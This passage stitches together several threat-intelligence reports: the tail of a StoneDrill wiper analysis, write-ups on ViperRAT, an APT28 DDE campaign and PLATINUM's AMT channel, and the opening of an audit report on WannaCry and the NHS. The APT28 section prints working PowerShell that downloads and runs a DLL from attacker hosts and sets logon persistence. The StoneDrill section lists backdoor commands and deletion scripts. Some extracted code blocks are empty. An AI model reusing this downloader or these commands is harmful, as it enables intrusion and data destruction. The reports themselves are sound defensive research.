"C:\ProgramData\InternetExplorer\%SELECTED_NAME%Stp.exe" sValueName = "Stp"
Del "%TEMP%\C-Strt-C-Up-T.bat"
2.7.3. Third step: C&C server selection
Multiple attempts are made to connect to the hosts configured in the ux and uy fields (found in
the sample configuration). The malware issues GET requests to
ct_if/ctpublic/Check_Exist.php
. The server answering with the
HANW-J6YS-P81J-KSD7
string is selected as the current live server.
C&C login
The next connection is a login attempt with the following request:
POST / HTTP/1.1
Host: www.eservic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://www.eservic.com/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
username=MD5Sum(login)&password=MD5Sum(password)&button=Login
2.7.4. Fourth step: Get commands list
During the fourth step, the malware requests available commands from the C&C:
/insert/index?id=%cid_from_config%%random_part_of_client_id%&hst=%base64encoded_computer_and_user_
name_cpuid0_checksum%&ttype=102&sta
te=201 HTTP/1.1
Host: www.eservic.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: %string_received_in_login_step%
Connection: close
Here is a list of the StoneDrill commands available:
Command Internal Help Strings
Command Description
1. OS (The is Response the Operating
System of the Client Machine)
Return details about Windows version, edition,
architecture and environment
version
2. Version (The Response is Version of
Running Product on the Client Machine)
2.0.1610.76
string returned
time
3. Time (The Response is Current Time of
the Client Machine)
Current system and local time are returned
shell
4. Shell Value (Give You Access the CMD
Console in the Client Machine; Value is
Anything that You Want to Writing in the
CMD Console of the Client Machine and
Execute it)
Stdout/stderr streams of executed
cmd.exe /C
%value%
command are captured and send back
to CC
screenshot
5. Screenshot (The Response is a JPEG File 1-At first the malware takes screenshot into
of the Screenshot of the Client Machine
randomly named .bmp file in %TEMP% folder.
Desktop)
2-Then takes second screenshot, now with jpeg
compression and store it as .jpg file with random
name. In case of success jpg creation bmp file is
deleted.
3-Send screenshot file to C&C and delete temporary
files.
delay
6. Delay Value (Adjust the Time-Interval for
the Server and Client Communication; Value
can be Between 1000-100000; 1000 is HighEnd Speed)
download
7. Download "From" "To" (Download a File
From "a URL" To "a Directory on the Client
Machine")
Downloaded file initially stored as
%TEMP%\Test.tmp
, then deXORed with 0xCC
and copied to specified location with VBS script
CDled-C-Cpy-T.vbs
as previously described, file is
then executed with command:
"cmd /c WMIC Process Call
Create
C:\Windows\System32\Wscri
pt.exe //NOLOGO
upload
8. Upload "From" (Upload a File From "a
Directory on the Client Machine")
update
9. Update "From" (Download the New
Version of the Product From "a URL" and
Execute it on the Client Machine)
Downloaded file initially stored with random name
inside %TEMP% folder, then renamed by using CUptd-C-Cpy-T.vbs and C-Up-C-Dt-T.bat similar to
previous steps
uninstall
10. Uninstall (Uninstall The Running Product
from the Client Machine and Delete All SideEffects)
Unregister autorun with command:
cmd /c REG DELETE
HKCU\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
/v Stp /f
Then drop and run C-Un-C-Instl-T.bat with body:
ping 1.1.1.1 -n 5 -w 2000 > nul
RMDIR /S /Q "C:\ProgramData\Chrome\"
RMDIR /S /Q "C:\ProgramData\InternetExplorer\"
Del "%TEMP%\C-Un-C-Instl-T.bat"
Then terminates itself.
antivirus
11. Antivirus (The Response is Installed
Antivirus on the Client Machine)
Queries Windows Management Instrumentation
(WMI) database for installed
AntiVirusProduct details. Runs additional registry
lookups for details of: Avast, McAfee, Avg,
BitDefender products.
help
12. Help (Response is the List of Supported
Commands in the Current Version of Product
that Running on the Client Machine)
List title is "-Command List of the Current
Vesrion are:"
2.8. StoneDrill similarities with Shamoon
Of course, one of the most important questions is the following: are StoneDrill and Shamoon
connected? This is a difficult question to answer. However, by listing the similarities and
differences between the two, anyone can come up with their own answer.
Although we used a Yara built on Shamoon samples to find StoneDrill, there are several other
similarities between the two:
Both Shamoon and StoneDril appear to be targeting Saudi organizations.
Samples have been compiled around the same time - October-November 2016.
Similar to previous generations of Shamoon, StoneDrill uses encrypted PE resources to
store the actual payload.
The most important differences include:
To avoid detection by emulators and sandboxing tools, the StoneDrill authors used far
more advanced anti-emulation techniques than Shamoon.
StoneDrill utilises VBS scripts to run self-delete scripts, while Shamoon didn
t use any
external scripts.
A distinction from the Shamoon malware is that the strings encryption in StoneDrill is
performed by alphabet table replacement.
StoneDrill does not use drivers during deployment, but rather through memory injection
into the victim
s preferred browser.
2.9. StoneDrill similarities with NewsBeef
Our initial analysis of StoneDril revealed some similarities with a threat actor we
ve seen before NewsBeef. While we call this the NewsBeef APT, this group has been reported in the past as
Charming Kitten or Newscaster (in 2014).
The similarities between NewsBeef and StoneDrill make us believe there is a very strong
connection there. Below we list some of the similarities we observed:
2.9.1. Winmain Signature
In NewsBeef:
B8 08 00 FE 7F FF 30 8F 44 24 20 68 B4 0F 00 00 FF 15 78 70 44 00 B8 08 00 FE 7F FF 30 8F 44 24 24 8B 4C
24 24 2B 4C 24 20 B8 6B CA 5F 6B F7 E1 C1 EA 16 80 EA 02 88 15 95 71 45 00
In StoneDrill:
B8 08 00 FE 7F FF 30 8F 44 24 14 68 B4 0F 00 00 FF 15 4C B0 63 00 B8 08 00 FE 7F FF 30 8F 44 24 10 8B 44
24 10 33 D2 2B 44 24 14 B9 80 96 98 00 F7 F1 2C 02 A2 61 D6 64 00
2.9.2. The OS command
In NewsBeef:
In StoneDrill:
In StoneDrill
2.9.3. The Update command
In NewsBeef:
In StoneDrill:
2.9.4. The Strings Decryption routine
In NewsBeef:
In StoneDrill:
2.9.5. The Payload Winmain
In NewsBeef:
In StoneDrill:
2.9.6. Command center name similarities
Besides the technical code similarities listed above, we noticed that the naming scheme for the
NewsBeef and StoneDrill C&Cs is quite similar. For instance:
StoneDrill
NewsBeef
www.chromup[.]com
www.chrome-up[.]date
service1.chrome-up[.]date
service.chrome-up[.]date
www.eservic[.]com
www.serveirc[.]com
3. Conclusions
Our discovery of StoneDrill gives another dimension to the existing wave of wiper attacks
against Saudi organizations that started with Shamoon 2.0 in November 2016. Compared to the
new Shamoon 2.0 variants, the most significant difference is the lack of a disk driver used for
direct access during the destructive step. Nevertheless, one does not necessarily need raw disk
access to perform destructive functions at file level, which the malware implements quite
successfully.
Of course, one of the most important questions here is the connection between Shamoon and
StoneDrill. Both wipers appear to have been used against Saudi organizations during a similar
timeframe of October-November 2016. Several theories are possible here:
StoneDrill is a less-used wiper tool, deployed in certain situations by the same Shamoon
group.
StoneDrill and Shamoon are used by different groups which are aligned in their interests.
StoneDrill and Shamoon are used by two different groups which have no connection to
each other and just happen to target Saudi organizations at the same time.
Taking all factors into account, our opinion is that the most likely theory is the second.
Additionally, StoneDrill appears to be connected with previously reported NewsBeef activity,
which continues to target Saudi organizations. From this point of view, NewsBeef and StoneDrill
appear to be continuously focused on targeting Saudi interests, while Shamoon is a flashy,
come-and-go high impact tool.
In terms of attribution, while Shamoon embeds Arabic-Yemen resource language sections,
StoneDrill embeds mostly Persian resource language sections. Geopolitical analysts would be
quick to point out that Iran and Yemen are both players in the Iran-Saudi Arabia proxy conflict.
Of course, we do not exclude the possibility of false flags.
Finally, many unanswered question remain in regards to StoneDrill and NewsBeef. The
discovery of the StoneDrill wiper in Europe is a significant sign that the group is expanding its
destructive attacks outside the Middle East. The target for the attack appears to be a large
corporation with a wide area of activity in the petro-chemical sector, with no apparent
connection or interest in Saudi Arabia.
As usual, we will continue to monitor the Shamoon, StoneDrill and NewsBeef attacks. A
presentation about StoneDrill will be given at the Kaspersky Security Analyst Summit
Conference, on April 2-6, 2017.
Kaspersky Lab products detect the Shamoon and StoneDrill samples as:
Trojan.Win32.EraseMBR.a
Trojan.Win32.Shamoon.a
Trojan.Win64.Shamoon.a
Trojan.Win64.Shamoon.b
Backdoor.Win32.RemoteConnection.d
Trojan.Win32.Inject.wmyv
Trojan.Win32.Inject.wmyt
HEUR:Trojan.Win32.Generic
4. Appendices
4.1. Indicators of Compromise
4.1.1. Shamoon MD5s
00c417425a73db5a315d23fac8cb353f
271554cff73c3843b9282951f2ea7509
2cd0a5f1e9bcce6807e57ec8477d222a
33a63f09e0962313285c0f0fb654ae11
38f3bed2635857dc385c5d569bbc88ac
41f8cd9ac3fb6b1771177e5770537518
5446f46d89124462ae7aca4fce420423
548f6b23799f9265c01feefc6d86a5d3
63443027d7b30ef0582778f1c11f36f3
6a7bff614a1c2fd2901a5bd1d878be59
6bebb161bc45080200a204f0a1d6fc08
7772ce23c23f28596145656855fd02fc
7946788b175e299415ad9059da03b1b2
7edd88dd4511a7d5bcb91f2ff177d29d
7f399a3362c4a33b5a58e94b8631a3d5
8405aa3d86a22301ae62057d818b6b68
8712cea8b5e3ce0073330fd425d34416
8fbe990c2d493f58a2afa2b746e49c86
940cee0d5985960b4ed265a859a7c169
9d40d04d64f26a30da893b7a30da04eb
aae531a922d9cca9ddca3d98be09f9df
ac8636b6ad8f946e1d756cd4b1ed866d
af053352fe1a02ba8010ec7524670ed9
b4ddab362a20578dc6ca0bc8cc8ab986
baa9862b027abd61b3e19941e40b1b2d
c843046e54b755ec63ccb09d0a689674
d30cfa003ebfcd4d7c659a73a8dce11e
da3d900f8b090c705e8256e1193a18ec
dc79867623b7929fd055d94456be8ba0
ec010868e3e4c47239bf720738e058e3
efab909e4d089b8f5a73e0b363f471c1
4.1.2. StoneDrill MD5s
ac3c25534c076623192b9381f926ba0d
0ccc9ec82f1d44c243329014b82d3125
8e67f4c98754a2373a49eaf53425d79a
fb21f3cea1aa051ba2a45e75d46b98b8
4.1.3. StoneDrill C2s
www.eservic[.]com
www.securityupdated[.]com
www.actdire[.]com
www.chromup[.]com
www.chrome-up[.]date
service1.chrome-up[.]date
service.chrome-up[.]date
www.serveirc[.]com
ViperRAT: The mobile APT targeting the Israeli Defense Force
that should be on your radar
blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/
February 16, 2017
By Michael Flossman, Security Researcher
ViperRAT is an active, advanced persistent threat (APT) that sophisticated threat actors are actively using to target
and spy on the Israeli Defense Force.
The threat actors behind the ViperRAT surveillanceware collect a significant amount of sensitive information off of
the device, and seem most interested in exfiltrating images and audio content. The attackers are also hijacking the
device camera to take pictures.
Using data collected from the Lookout
global sensor network, the Lookout
research team was able to gain unique
visibility into the ViperRAT malware,
including 11 new, unreported
applications. We also discovered and
analyzed live, misconfigured malicious
command and control servers (C2), from
which we were able to identify how the attacker gets new, infected apps to secretly install and the types of activities
they are monitoring. In addition, we uncovered the IMEIs of the targeted individuals (IMEIs will not be shared publicly
for the privacy and safety of the victims) as well as the types of exfiltrated content.
In aggregate, the type of information stolen could let an attacker know where a person is, with whom they
are associated (including contacts
profile photos), the messages they are sending, the websites they visit
and search history, screenshots that reveal data from other apps on the device, the conversations they
have in the presence of the device, and a myriad of images including anything at which device
s camera is
pointed.
Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted
mobile attacks against governments and business is a real problem.
Lookout researchers have been tracking this threat for the last month. Given that this is an active threat, we
ve been
working behind-the-scenes with our customers to ensure both personal and enterprise customers are protected from
this threat and only decided to come forward with this information after the research team at Kaspersky released a
report earlier today.
Additionally, we have determined that though original reports of this story attribute this surveillanceware tool to
Hamas, this may not be the case, as we demonstrate below.
The increasing sophistication of surveillanceware
The structure of the surveillanceware indicates it is very sophisticated. Analysis indicates there are currently two
distinct variants of ViperRAT. The first variant is a
first stage application,
that performs basic profiling of a device,
and under certain conditions attempts to download and install a much more comprehensive surveillanceware
component, which is the second variant.
The first variant involves social engineering the target into downloading a trojanized app. Previous reports alleged
this surveillanceware tool was deployed using
honey traps
where the actor behind it would reach out to targets via
fake social media profiles of young women. After building an initial rapport with targets, the actors behind these
social media accounts would instruct victims to install an additional app for easier communication. Specifically,
Lookout determined these were trojanized versions of the apps SR Chat and YeeCall Pro. We also uncovered
ViperRAT in a billiards game, an Israeli Love Songs player, and a Move To iOS app.
The second stage
The second stage apps contain the surveillanceware capabilities. Lookout uncovered nine secondary payload
applications:
* These apps have not been previously reported and were discovered using data from the Lookout global sensor
network, which collects app and device information from over 100 million sensors to provide researchers and
customers with a holistic look at the mobile threat ecosystem today.
Naming additional payload applications as system updates is a clever technique used by malware authors to trick
victims into believing a threat isn
t present on their device. ViperRAT takes this one step further by using its dropper
app to identify an appropriate second stage
update
that may go unnoticed. For example, if a victim has Viber on
their device, it will choose to retrieve the Viber Update second stage. If he doesn
t have Viber, the generically-named
System Updates app gets downloaded and installed instead.
What was taken
The actors behind ViperRAT seem to be particularly interested in image data. We were able to identify that 8,929
files had been exfiltrated from compromised devices and that the overwhelming majority of these, 97 percent, were
highly likely encrypted images taken using the device camera. We also observed automatically generated files on
the C2, indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office
documents. This should be highly alarming to any government agency or enterprise.
We observed legitimate exfiltrated files of the following types of data:
Contact information
Compressed recorded audio in the Adaptive Multi-Rate (amr) file format
Images captured from the device camera
Images stored on both internal device and SDCard storage that are listed in the MediaStore
Device geolocation information
SMS content
Chrome browser search history and bookmarks
Call log information
Cell tower information
Device network metadata; such as phone number, device software version, network country, network
operator, SIM country, SIM operator, SIM serial, IMSI, voice mail number, phone type, network type, data
state, data activity, call state, SIM state, whether device is roaming, and if SMS is supported.
Standard browser search history
Standard browser bookmarks
Device handset metadata; such as brand, display, hardware, manufacturer, product, serial, radio version, and
SDK.
Command and control API calls
ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets.
Below is a collection of API methods and a brief description around their purpose.
On attribution
Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas. Israeli media published the first
reports about the social networking and social engineering aspects of this campaign. However it
s unclear whether
organizations that later reported on ViperRAT performed their own independent research or simply based their
content on the original Israeli report. Hamas is not widely known for having a sophisticated mobile capability, which
makes it unlikely they are directly responsible for ViperRAT.
ViperRAT has been operational for quite some time, with what appears to be a test application that surfaced in late
2015. Many of the default strings in this application are in Arabic, including the name. It is unclear whether this
means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic.
This leads us to believe this is another actor.
What this means for you
All Lookout customers are protected from this threat. However, the existence of threats like ViperRAT and Pegasus,
the most sophisticated piece of mobile surveillanceware we
ve seen to date, are evidence that attackers are
targeting mobile devices.
Threat Group APT28 Slips Office Malware into Doc Citing NYC
Terror Attack
securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/
By Ryan Sherstobitoff and Michael Rea
November 7, 2017
During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research
analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic
Data Exchange (DDE) technique that has been previously reported by Advanced Threat Research. This
document likely marks the first observed use of this technique by APT28. The use of DDE with
PowerShell allows an attacker to execute arbitrary code on a victim
s system regardless whether macros
are enabled. (McAfee product detection is covered in the Indicators of Compromise section at the end of
the document.)
APT28, also known as Fancy Bear, has recently focused on using different themes. In this case it
capitalized on the recent terrorist attack in New York City. The document itself is blank. Once opened, the
document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim
system.
The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the
creation of Seduploader.
The document we examined for this post:
Filename: IsisAttackInNewYork.docx
Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e
Creation date: 2017-10-27T22:23:00Z
The document uses the recently detailed DDE technique found in Office products to invoke the command
prompt to invoke PowerShell, which runs two commands. The first:
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-NoP -sta -NonI -W Hidden $e=(New-Object
System.Net.WebClient).DownloadString(
hxxp://netmediaresources[.]com/config.txt
);powershell -enc $e
#.EXE
The second PowerShell command is Base64 encoded and is found in the version of config.txt received
from the remote server. It decodes as follows:
$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+
\vms.dll
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(
hxxp://netmediaresources[.]com/media/resource/vms.dll
,$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+
\System32\rundll32.exe
$p_a=$p+
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+
\vms.bat
$text=
set inst_pck =
%ALLUSERSPROFILE%\vms.dll
`r`n
if NOT exist %inst_pck %
(exit)
`r`n
start rundll32.exe %inst_pck %,#1
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path
HKCU:\Environment
-Force | Out-Null;
New-ItemProperty -Path
HKCU:\Environment
-Name
UserInitMprLogonScript
-Value
$p_bat
PropertyType String -Force | Out-Null;
The PowerShell scripts contact the following URL to download Seduploader:
hxxp://netmediaresources[.]com/media/resource/vms.dll
The Seduploader sample has the following artifacts:
Filename: vms.dll
Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7
Compile date: 2017-10-31 20:11:10
Control server: webviewres[.]net
The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles
prospective victims, pulling basic host information from the infected system to the attackers. If the system
is of interest, then the installation of X-Agent or Sedreco usually follows.
We have observed APT28 using Seduploader as a first-stage payload for several years from various
public reporting. Based on structural code analysis of recent payloads observed in the campaign, we see
they are identical to previous Seduploader samples employed by APT28.
We identified the control server domain associated with this activity as webviewres[.]net, which is
consistent with past APT28 domain registration techniques that spoof legitimate-sounding infrastructure.
This domain was registered on October 25, a few days before the payload and malicious documents
were created. The domain was first active on October 29, just days before this version of Seduploader
was compiled. The IP currently resolves to 185.216.35.26 and is hosted on the name servers ns1.njal.la
and ns2.njal.la.
Further McAfee research identified the following related sample:
Filename: secnt.dll
Sha1: ab354807e687993fbeb1b325eb6e4ab38d428a1e
Compile date: 2017-10-30 23:53:02
Control server: satellitedeluxpanorama[.]com. (This domain uses the same name servers as
above.)
The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the
same techniques and payload. We can clearly establish that the campaign involving documents using
DDE techniques began on October 25.
The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of
November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for
dropping the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This
document was created on October 27. The document is distributed from
hxxp://sendmevideo[.]org/SaberGuardian2017.docx. The document calls
sendmevideo[.]org/dh2025e/eh.dll to download Seduploader
(ab354807e687993fbeb1b325eb6e4ab38d428a1e).
The PowerShell command embedded in this document:
$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+
\mvdrt.dll
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(
http://sendmevideo.org/dh2025e/eh.dll
,$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+
\System32\rundll32.exe
$p_a=$p+
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+
\mvdrt.bat
$text=
set inst_pck =
%ALLUSERSPROFILE%\mvdrt.dll
`r`n
if NOT exist %inst_pck %
(exit)
`r`n
start rundll32.exe %inst_pck %,#1
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path
HKCU:\Environment
-Force | Out-Null;
New-ItemProperty -Path
HKCU:\Environment
-Name
UserInitMprLogonScript
-Value
$p_bat
PropertyType String -Force | Out-Null;
The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar-to secnt.dll
ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and highly likely
to be part of the same campaign. These two DLL implants are likely part of the same campaign.
Furthermore, the sample 4bc722a9b0492a50bd86a1341f02c74c0d773db7, based on our code analysis,
is 99% similar to the DLL implant 8a68f26d01372114f660e32ac4c9117e5d0577f1, which was used in a
campaign spoofing the upcoming cyber conference Cy Con U.S.
The attack techniques in the two campaigns differ: The campaign spoofing the Cy Con U.S conference
used document files to execute a malicious VBA script; this campaign using the terrorist theme uses DDE
within a document file to execute PowerShell and fetches a remote payload from a distribution site. The
payloads, however, are identical for both campaigns.
Conclusion
APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into
infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the
publicity the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from
using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass
network defenses. Finally, the use of recent domestic events and a prominent US military exercise
focused on deterring Russian aggression highlight APT28
s ability and interest in exploiting geopolitical
events for their operations.
Indicators of Compromise
SHA1 Hashes
ab354807e687993fbeb1b325eb6e4ab38d428a1e (vms.dll, Seduploader implant)
4bc722a9b0492a50bd86a1341f02c74c0d773db7 (secnt.dll, Seduploader implant)
1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)
68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian.docx)
Domains
webviewres[.]net
netmediaresources[.]com
185.216.35.26
89.34.111.160
McAfee coverage
McAfee products detect this threat as RDN/Generic Downloader.x.
PLATINUM continues to evolve, find ways to maintain
invisibility
blogs.technet.microsoft.com /mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/
msft-mmpc
June 7,
2017
Back in April 2016, we released the paper PLATINUM: Targeted attacks in South and Southeast Asia , where we
detailed the tactics, techniques, and procedures of the PLATINUM activity group.
We described a group that was well-resourced and quickly adopted advanced techniques, such as hot patching to
silently inject code into processes. They used hot patching even when traditional injection techniques could have
been sufficient and less costly to develop.
Since the 2016 publication, Microsoft has come across an evolution of PLATINUM
s file-transfer tool, one that uses
the Intel
Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication. This channel
works independently of the operating system (OS), rendering any communication over it invisible to firewall and
network monitoring applications running on the host device. Until this incident, no malware had been discovered
misusing the AMT SOL feature for communication.
Upon discovery of this unique file-transfer tool, Microsoft shared information with Intel, and the two companies
collaborated to analyze and better understand the purpose and implementation of the tool. We confirmed that the
tool did not expose vulnerabilities in the management technology itself, but rather misused AMT SOL within target
networks that have already been compromised to keep communication stealthy and evade security applications.
The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast
Asia
PLATINUM is known to customize tools based on the network architecture of targeted organizations. The
diagram below represents the file-transfer tool
s updated channel and network flow.
Figure 1. PLATINUM file-transfer tool network flow
The AMT SOL feature is not enabled by default and requires administrator privileges to provision for usage on
workstations. It is currently unknown if PLATINUM was able to provision workstations to use the feature or
piggyback on a previously enabled workstation management feature. In either case, PLATINUM would need to have
gained administrative privileges on targeted systems prior to the feature
s misuse.
AMT Serial-over-LAN (SOL) communication channel
Active Management Technology (AMT) enables remote management of devices and is provided as a feature of
Intel
vPro
processors and chipsets. AMT runs in the Intel Management Engine (ME), which runs its own
operating system to execute on an embedded processor located in the chipset (Platform Controller Hub, PCH). As
this embedded processor is separate from the primary Intel processor, it can execute even when the main processor
is powered off and is therefore able to provide out-of-band (OOB) remote administration capabilities such as remote
power-cycling and keyboard, video, and mouse control (KVM).
AMT has a Serial-over-LAN (SOL) feature that exposes a virtual serial device with a chipset-provided channel over
TCP.
Figure 2. AMT SOL device
This functionality works independently of the device host operating system networking stack
the ME makes use of
its own networking stack and has access to the hardware network interface. This means that even if networking is
disabled on the host, SOL will still function as long as the device is physically connected to the network.
Figure 3. AMT SOL component stack
Furthermore, as the SOL traffic bypasses the host networking stack, it cannot be blocked by firewall applications
running on the host device. To enable SOL functionality, the device AMT must be provisioned. Also, establishment of
a SOL session requires a username and password
usually selected during device provisioning. The tool would
therefore require the relevant credentials to establish such a session.
One possibility is that PLATINUM might have obtained compromised credentials from victim networks. Another
possibility is that the targeted systems did not have AMT provisioned and PLATINUM, once they
ve obtained
administrative privileges on the system, proceeded to provision AMT.
There are several methods for provisioning AMT. The most straightforward is host-based provisioning (HBP), which
can be done from within the host Windows OS itself and requires administrator permissions. During the provisioning
process, PLATINUM could select whichever username and password they wish. HBP enables access to a subset of
AMT functionality, which includes SOL but restricts access to other features such as KVM redirect.
How PLATINUM uses SOL
In the first version of the file-transfer tool, which we described in the original paper, network communication is done
over TCP/IP by utilizing the regular network APIs. The presentation layer protocol is straightforward: the buffer is
made up of a two-byte header
the indication length
and the Blowfish-encrypted payload data itself.
Figure 4. TCP protocol length header and payload
The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK
s Redirection
Library API (imrsdk.dll). Data transactions are performed by the calls IMR_SOLSendText()/IMR_SOLReceiveText(),
which are analogous to networking send() and recv() calls. The SOL protocol used is identical to the TCP protocol
other than the addition of a variable-length header on the data for error detection. Also, the updated client sends an
unencrypted packet with the content
before authentication.
Figure 5. AMT SOL protocol error-detection header, length header, and payload
The new header has various fields to detect possible data corruption errors, including a CRC-16 and a binary index
of the bytes having the set of most significant bits (MSB).
Figure 6. Construction of error-detection header
The following video demonstrates how the PLATINUM tool can be used to transfer malware to a computer with AMT
provisioned:
Detecting unusual binaries that use AMT
If an attacker who has access to AMT credentials attempts to use the SOL communication channel on a computer
running Windows Defender ATP , behavior analytics coupled with machine learning can detect the targeted attack
activity. Windows Defender ATP displays an alert similar to the one shown below. Windows Defender ATP can
differentiate between legitimate usage of AMT SOL and targeted attacks attempting to use it as a communication
channel.
Figure 7. Windows Defender ATP detection of malicious AMT SOL channel activity
The PLATINUM tool is, to our knowledge, the first malware sample observed to misuse chipset features in this way.
While the technique used here by PLATINUM is OS independent, Windows Defender ATP can detect and notify
network administrators of attempts to leverage the AMT SOL communication channel for unauthorized activity,
specifically when used against a computer running Windows.
At Microsoft, we continuously monitor the threat landscape for novel techniques used for malicious purposes. We
also constantly build mechanisms that mitigate resulting risks and protect customers. The discovery of this new
PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP
team does to provide customers greater visibility into suspicious activities transpiring on their networks.
Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel
Active Management Technology (AMT),
but uses the technology within an already compromised network to evade security monitoring tools.
David Kaplan, Stefan Sellmer, and Andrea Lelli
Windows Defender ATP Research Team
A picture of the National Audit Office logo
Report
by the Comptroller
and Auditor General
Department of Health
Investigation: WannaCry
cyber attack and the NHS
HC 414 SESSION 2017
2019
27 OCTOBER 2017
Our vision is to help the nation spend wisely.
Our public audit perspective helps Parliament hold
government to account and improve public services.
The National Audit Office scrutinises public spending for Parliament and is independent
of government. The Comptroller and Auditor General (C&AG), Sir Amyas Morse KCB,
is an Officer of the House of Commons and leads the NAO. The C&AG certifies the
accounts of all government departments and many other public sector bodies. He has
statutory authority to examine and report to Parliament on whether departments and
the bodies they fund have used their resources efficiently, effectively, and with economy.
Our studies evaluate the value for money of public spending, nationally and locally.
Our recommendations and reports on good practice help government improve public
services, and our work led to audited savings of
734 million in 2016.
Department of Health
Investigation: WannaCry
cyber attack and the NHS
Report by the Comptroller and Auditor General
Ordered by the House of Commons
to be printed on 25 October 2017
This report has been prepared under Section 6 of the
National Audit Act 1983 for presentation to the House of
Commons in accordance with Section 9 of the Act
Sir Amyas Morse KCB
Comptroller and Auditor General
National Audit Office
24 October 2017
HC 414 |
10.00
This report investigates the NHS
s response to the
cyber attack that affected it in May 2017 and the
impact on health services.
Investigations
We conduct investigations to establish the underlying facts in circumstances
where concerns have been raised with us, or in response to intelligence that
we have gathered through our wider work.
National Audit Office 2017
The material featured in this document is subject to
National Audit Office (NAO) copyright. The material
may be copied or reproduced for non-commercial
purposes only, namely reproduction for research,
private study or for limited internal circulation within
an organisation for the purpose of review.
Copying for non-commercial purposes is subject
to the material being accompanied by a sufficient
acknowledgement, reproduced accurately, and not
being used in a misleading context. To reproduce
NAO copyright material for any other use, you must
contact copyright@nao.gsi.gov.uk. Please tell us who
you are, the organisation you represent (if any) and
how and why you wish to use our material. Please
include your full contact details: name, address,
telephone number and email.
Please note that the material featured in this
document may not be reproduced for commercial
gain without the NAO
s express and direct
permission and that the NAO reserves its right to
pursue copyright infringement proceedings against
individuals or companies who reproduce material for
commercial gain without our permission.
Links to external websites were valid at the time of
publication of this report. The National Audit Office
is not responsible for the future validity of the links.
11594
10/17
Contents
What this investigation is about 4
Summary 5
Part One
The impact of the cyber attack 11
Part Two
Why some parts of
the NHS were affected 16
Part Three
How the Department and
the NHS responded 21
Appendix One
Our investigative approach 28
Appendix Two
Trusts infected or disrupted
by WannaCry 30
The National Audit Office study team
consisted of:
Finnian Bamber, Alex Bowyer,
Nigel Leung, Francisca Lopes,
Linda Mills and David Williams,
under the direction of Robert White.
This report can be found on the
National Audit Office website at
www.nao.org.uk
For further information about the
National Audit Office please contact:
National Audit Office
Press Office
197 Buckingham Palace Road
Victoria
London
SW1W 9SP
Tel: 020 7798 7400
Enquiries: www.nao.org.uk/contact-us
Website: www.nao.org.uk
Twitter: @NAOorguk
If you are reading this document using a screen reader you may wish to use the bookmarks to navigate around this document.
4 What this investigation is about Investigation: WannaCry cyber attack and the NHS
What this investigation is about
On Friday 12 May 2017 a global ransomware attack, known as WannaCry, affected
more than 200,000 computers in at least 100 countries. In the UK, the attack particularly
affected the NHS, although it was not the specific target. At 4 pm on 12 May, NHS England
declared the cyber attack a major incident and implemented its emergency arrangements
to maintain health and patient care. On the evening of 12 May a cyber
security researcher
activated a kill-switch so that WannaCry stopped locking devices.
According to NHS England, the WannaCry ransomware affected at least 81 out of
the 236 trusts across England, because they were either infected by the ransomware or
turned off their devices or systems as a precaution. A further 603 primary care and other
NHS organisations were also infected, including 595 GP practices.
Before the WannaCry attack the Department of Health (the Department) and its
s-length bodies had work under way to strengthen cyber-security in the NHS. For
example, NHS Digital was broadcasting alerts about cyber threats, providing a hotline
for dealing with incidents, sharing best practice and carrying out on-site assessments to
help protect against future cyber attacks; and NHS England had embedded the 10 Data
